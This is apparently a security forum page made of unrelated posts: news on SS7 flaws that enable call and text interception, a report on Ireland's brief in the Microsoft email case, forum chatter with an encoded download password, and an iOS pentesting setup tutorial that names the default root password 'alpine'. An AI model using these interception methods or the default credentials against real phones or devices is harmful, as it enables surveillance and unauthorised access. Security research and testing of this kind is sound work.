to be cautious. He knew from experience that this “area of business” was full of informants and undercover cops. Falkenthal called Kuhl two weeks later. Her contact was impressed with the sample and interested in a purchase. They started with a test batch of $250,000, which she bought for 21,600 euros. The price was typical for forgeries, which generally sell at a steep discount because so much of the risk is borne by the buyer. As a consequence, counterfeiting is profitable only on a large scale. During that exchange, Kuhl told Falkenthal that he and his business partner had about $8 million more in currency to sell. “If the contact is satisfied with this first installment, we should talk,” he said. Ten days later she got back to him with good news: The man was “happy with the forgeries” and wanted to make a larger purchase. How about $6.5 million? Seated at the café across from the cathedral that afternoon, Kuhl handed Falkenthal a note with a price for this new order: 533,000 euros for the $6.5 million in counterfeits. She agreed. Then they decided to make the handoff the next day at his studio. Kuhl also told Falkenthal that to ensure his safety he would have someone nearby during the exchange, just to be sure the handover went smoothly. “I have no choice,” he said, “even though I basically trust you.” When Kuhl and Falkenthal stood up to part ways, Falkenthal added that she would bring her own boxes. After all, $6.5 million in $100 bills weighs about 150 pounds. More at: The Ultimate Counterfeiter Isn't a Crook—He's an Artist | WIRED

Security vulnerabilities in the SS7 phone-call routing protocol that allow mobile call and text message tracking will be revealed this weekend. Details of SS7 vulnerabilities are due to be revealed to the public for the first time at the Chaos Communication Congress hacker conference in Hamburg on 27 December (schedule here). The talk, entitled SS7: Locate. Track. Manipulate, by Tobias Engel, promises to be absolutely fascinating. Engel has given a preview interview to the Washington Post outlining what he is due to discuss. “The flaws discovered by the German researchers are actually functions built into SS7 for other purposes – such as keeping calls connected as users speed down highways, switching from cell tower to cell tower – that hackers can repurpose for surveillance because of the lax security on the network,” the Washington Post explains. “Those skilled at the myriad functions built into SS7 can locate callers anywhere in the world, listen to calls as they happen or record hundreds of encrypted calls and texts at a time for later decryption. There also is potential to defraud users and cellular carriers by using SS7 functions.” Engel, founder of Sternraute, and Karsten Nohl, chief scientist for Security Research Labs who was one of a team that cracked GSM’s A5/1 encryption in 2009, separately discovered vulnerabilities in the SS7 telecom signalling protocol before deciding to present their research findings together. The German researchers discovered it was possible to wiretap mobile calls using SS7 trickery. Commands sent over SS7 could be used to hijack a mobile phone’s “forwarding” function – a service offered by many carriers. This would allow calls to be routed through a second monitored number before forwarding it to the subscriber, leaving them none the wiser anything amiss was taking place. The second technique involves re-merging mobile phone traffic before using the SS7 channel to request that the caller’s carrier release a temporary encryption key need to decrypt recorded communication . Such requests can be blocked but this rarely happens in practice, according to test by Engel and Nohl on 20 carriers. The hack would circumvent any network encryption. Engel explained to us: “The difference with authentication between GSM and UMTS [3G] is that in GSM, the handset has to authenticate itself, but anyone can play network if he has the right equipment (i.e. IMSI catcher). In UMTS, the network also has to authenticate itself. That is why there are no UMTS IMSI catchers, only devices that do a UMTS-to-GSM force-down for the handset and then capture the handset in GSM.” Engel also told us that while the A5/3 encryption used in 3G (and some GSM) has not been cracked, signalling data which is normally used between switching centres that want to hand over a call if the subscriber travels into a new service area can, however, leak the key. End-to-end encryption methods are immune to the attack. Nohl was able to collect and decrypt a text message sent using the phone of a German senator, who cooperated in the experiment. Eh? What's all that in layman's terms? When you make a call from a mobile, there is a considerable amount of information sent between the handset and the network. This contains details of who you are, who you are calling, where you are, signal strength and so on. The network will check that you have credit and that you are not barred from calling the number you have dialled. This all happens over a separate channel to the one used for voice. As you move from cell tower to cell tower, the signalling channel is used to hand you over, and if you end a call it closes the voice channel neatly: there is a difference between the signal disappearing and hanging up, so that the network can try to reestablish the link if it fades. The signalling channel, or SS7, is also used for sending short packets of data. Handsets can be told if you are in a particular cell – cheaper calls from home were fashionable for a while – and it’s the mechanism by which text messages are sent and received. Since mobile phones went digital more than a decade ago, calls have been encrypted. When the GSM standard was drafted in 1987 it was believed that the security would have life of about 20 years. The network requires a secure key to talk to the handset. The interception which has been achieved comes from a man-in-the-middle attack where the handset is forced to talk to the person doing the intercept and then onto the network, thanks to a brute force crack of the key. SS7 security - a brief rundown SS7 is a call signalling protocol first designed in the 1980s. Anecdotal evidence suggests that signals intelligence agencies are already actively at work exploiting the security shortcomings of the protocol. Ukrainian mobile subscribers were targeted by suspicious/custom SS7 packets from telecom networks with Russian addresses, causing their location and potentially the contents of their phone calls to be obtained. Security firm AdaptiveMobile has put together an analysis of this new form of SS7-based attack, which refers to an under-publicised report by the Ukrainian Telecom Regulator, aided by the Ukrainian Security Service (SBU), into suspected telecom network hacking against MTS Ukraine back in April, at the height of a conflict between Russia and Ukraine over the fate of the Crimea. The 'attacks' outlined in the document involved SS7 packets being sent between the mobile operators… Without going into specific details, what occurred is a series of SS7 packets were received by MTS Ukraine's SS7 network which modified control information stored in network switches for a number of MTS Ukraine mobile users. In doing so, when someone tried to ring one of the affected mobile subscribers, their call would be forwarded to a physical land line number in St. Petersburg, Russia, without their knowledge - in effect the call has been intercepted. The investigation stated that the custom SS7 packets themselves came from links allocated to MTS Russia, the parent company of MTS Ukraine. The Ukrainian regulator then assigned responsibility for the nodes that generated the SS7 based on the origination addresses in the SS7 packets received. According to the report, some of the SS7 source addresses that originated the attack were assigned to MTS Russia, while others were assigned to Rostov Cellular Communications. The report concludes that over a three day period in April 2014, a number of Ukrainian mobile subscribers were affected by suspicious SS7 packets from telecom network elements with Russian addresses, causing their location and potentially the contents of their phone calls to be intercepted. MTS Russia denied that the SS7 address used was under its control, leaving the ultimate instigator behind the attacks as something of a mystery. Units of the Russian Federal Security Service (FSB) or Foreign Intelligence Service (SVR) are obvious prime suspects for this sort of malfeasance. It was reported that MTS Ukraine was not alone of being at risk, as the Ukrainian Telecom Regulator stated at a later date that Astelit and Kyivstar – the other main Ukrainian mobile operators – also experienced “external interference”. AdaptiveMobile warns that countries affected by this type of attack will be inclined to build their own capability, a situation that could lead to an “SS7 arms-race”. Source

Ireland waded into an email privacy case Tuesday by filing a friend-of-the-court brief supporting Microsoft's opposition to turning over emails in a criminal case that are stored on servers in Dublin. The Irish government filed the motion in the US Court of Appeals for the Second Circuit in New York asking the US to respect its sovereignty. "Ireland does not accept any implication that it is required to intervene into foreign court proceedings to protect its sovereignty," the brief read. But the Irish government also said it would consider allowing access to data in its country. "As minister for data protection, I have given detailed consideration, from an Irish perspective, to the issues raised in this complex case," Ireland's Dara Murphy said Tuesday in a statement. "There are important principles of public policy at play. Having engaged in detailed consultation with my colleagues in government, it was agreed that Ireland should submit an amicus curiae brief to the US court that focuses on the principles involved in this case and that points to the existing process for mutual legal assistance in criminal matters." The brief notes that the US and Ireland signed a treaty in 2001 that allows them to transfer case evidence to assist in law enforcement activities. The brief has pleased Microsoft, which has called on Ireland to chime in on the issue before any decisions are made by US courts. The US and Microsoft have for the last year been waging a legal war over whether the software company can and should hand over emails from users involved in the narcotics case. Last December, a New York judge said that Microsoft would be required to provide the US government with user emails in connection with a criminal investigation. Microsoft discovered that the emails were residing on one of its servers in Dublin and subsequently refused the request, saying that the US doesn't have the right to obtain private emails without the "knowledge or consent of the subscriber or the relevant foreign government where the data is stored." Microsoft says that the stored communications provisions of the Electronic Communications Privacy Act (ECPA) do not apply outside of the United States. Despite Microsoft's concerns, a court ruled in July that Microsoft must hand over the emails. Microsoft again refused, saying that the US doesn't have the right to access email communications from people who are not living in the country. While Microsoft General Counsel Brad Smith stopped short of going that far with his statement on the matter on Tuesday, he did write in a blog post on the issue that "the Irish government's engagement underscores that an international dialogue on this issue is not only necessary but possible." Smith went on to say that Microsoft has long desired collaboration between governments and not for one to "exercise" any "authority" over another. Microsoft declined to provide additional comment beyond what Smith wrote in his blog post. Source

"Tragedie pentru o familie de ciori" / "Niste vecinii din alt copac ... si care i-ar fi amenintat ca le omoara puiu si le sparge ouale" "Puiul era jumulit si avea mai multe vanatai" Doamne abia se abtinea saracu sa nu moara de ras...

Omul vrea sa spuna ca parola este cryptata. cnN0Zm9ydW1z trebuie sa decryptezi ( e cryptata pentru a nu descarca toti n00balai ) Pune mintea la contributie.

Introduction In this article series, we will be learning about the tools and techniques required to perform penetration testing and Vulnerability assessment on IOS Applications. Jailbreaking your device If you are serious about IOS security, then having a jailbroken device is a must. In this section, we will look at how we can jailbreak an IOS device. Jailbreaking a device has many advantages. You can install tools like nmap, metasploit and even run your own custom python code on the device. Imagine having the power to run a vulnerability scan on a website from the palm of your hand. To know more about jailbreaking and the advantages of doing it, i recommend you have a look at this article. Jailbreaking your device is as simple as downloading a jailbreaking software and clicking on jailbreak. I would recommend you use evasi0n to jailbreak if your device if your device is running IOS 6.x and redsn0w if your device is running IOS 5.x. In this case, i am going to jailbreak my new Ipad (3rd generation) running IOS 6.0.1. Once you download evasi0n and run it, you will see that it automatically detects the device and tells you if a jailbreak is available for it or not. All you have to do is click on Jailbreak and let evasi0n do all the magic. As you can see, the jailbreak process has started. After some time, evasi0n will reboot the device and run the exploit. Once it is done running the exploit, it will install Cydia and its packages list on the device. Cydia is a GUI that allows you to download software packages and other apps on your jailbroken device that you would normally not find on the App store. Mostly all the jailbreak softwares install Cydia on your device by default. You can call Cydia the App Store for jailbroken devices. Wait for some more time until you get this prompt If you go to your device, you will see that a new app icon named Jailbreak has come up. Tap on it to finish the jailbreak process. You will see that your device will reboot. Please wait patiently and wait for the process to finish. Once the device has finished rebooting, you will see that a new app named Cydia appears on your apps list. This is an indication that your device has been successfully jailbroken. Congratulations, you have made the first leap in the field of IOS hacking. Setting up a mobile auditing platform Now that you are done jailbreaking your device, the next step is to install some of the very important linux command line tools such as wget, ps, apt-get and other applications used for auditing an IOS application. The first and foremost thing however is to install OpenSSH on your device. This will allow you to login to your jailbroken device and perform various other tasks as we will see in this article later. Go to Cydia, tap on the search tab on the bottom and search for OpenSSH. Tap on OpenSSH and on the next view tap on install. Tap on Confirm on the next view to confirm this action. This will insall OpenSSH on your device. Before we use ssh to log in to the device, we should install some other command line tools also. Almost all the popular hacker tools can be installed by using the BigBoss Recommended tools package which comes with a list of hacker tools. To install BigBoss Recommended tools just search for it in Cydia and tap on install. Some of the important command line tools that it installs are APT 0.6 Transitional, Git, GNU Debugger, less, make, unzip, wget and SQLite 3.x One more thing that we can do is install MobileTerminal from Cydia. It allow you to run terminal commands on your device from your device rather than logging in via ssh from a different system. Again, downloading MobileTerminal on your device is as simple as searching for it in Cydia and tapping on Install Once it is installed, you will see a new app icon with the name Terminal. Tap on it, you will be given a terminal. Now try and run any Unix command on it. In this case, let me get a list of all the running processes by using the command ps As you can see, it works! Let’s see if we can login to our jailbroken device using ssh. Make sure your laptop and the device are connected to the same network and then find out the IP address of the device. To find out the IP address of your device, just go to Settings -> Wi-Fi and then click on the network your device is connected to. As we can see, the IP address is 192.168.2.3. Let’s ssh to it as the user root. Just type in the follwing command as shown below.The default password for the user root is alpine. It is recommended that you should change your password as soon as you have Open SSH installed. This is because there has been many malwares which log in to your device and steal information by using the default username/password combination. To change the password, just type in passwd and then type the new password twice. This will change the password for the user root.All of these steps have been perfomed in the image shown below. Note:Make sure the app Cydia is in the background while running any command that requires root privileges. This is because Cydia runs as root and hence it wouldn’t be possible to get a lock on a process which is already being used by Cydia. Once this is done, do an apt-get update to get the latest packages lists. It wouldn’t be a bad idea to do an apt-get upgrade also. This will fetch the new versions of packages that are already existing on the machine and don’t have the latest version using the information contained from doing an apt-get update. The next thing to do is to install class-dump-z which we will be using to dump class information from an IOS application. To get the application, go to its official page and copy the link for the latest version. At the time of writing of this article, the latest version is 0.2a. Now, ssh into your device and fetch the file from that link using the command wget. Another option would have been to download file on your system and then upload it to your device using sftp. Once the download has finished, use the tar program to extract the archive. Once this is done, go inside the folder iphone_armv6 and copy the class-dump-z executable into /usr/bin directory. This will make sure you can run class-dump-z from anywhere on the device. Once you have copied the executable, just type class-dump-z. If you get the output as shown in the figure below, this means that class-dump-z has been successfully installed. Further Reading There are not a lot of resources as far as IOS Security is concerned but here are some of the very good ones. SecurityTube has a very detailed course on IOS security. Security Learn has some very good articles on penetration testing of IOS Applications. Hacking and Securing IOS applications is probably the best book i have read that deals with attacking IOS applications Lookout’s blog is also another valuable resource in learning about the latest techniques and exploits in the mobile world. Conclusion In this article, we learned how to setup a mobile auditing environment on a jailbroken device. In the next article we will look at how we can analyze applications for class information using class-dump-z. ================================================================== IOS Application security Part 1 – Setting up a mobile pentesting platform Pentru restul de 37 tutoriale: HERE & HERE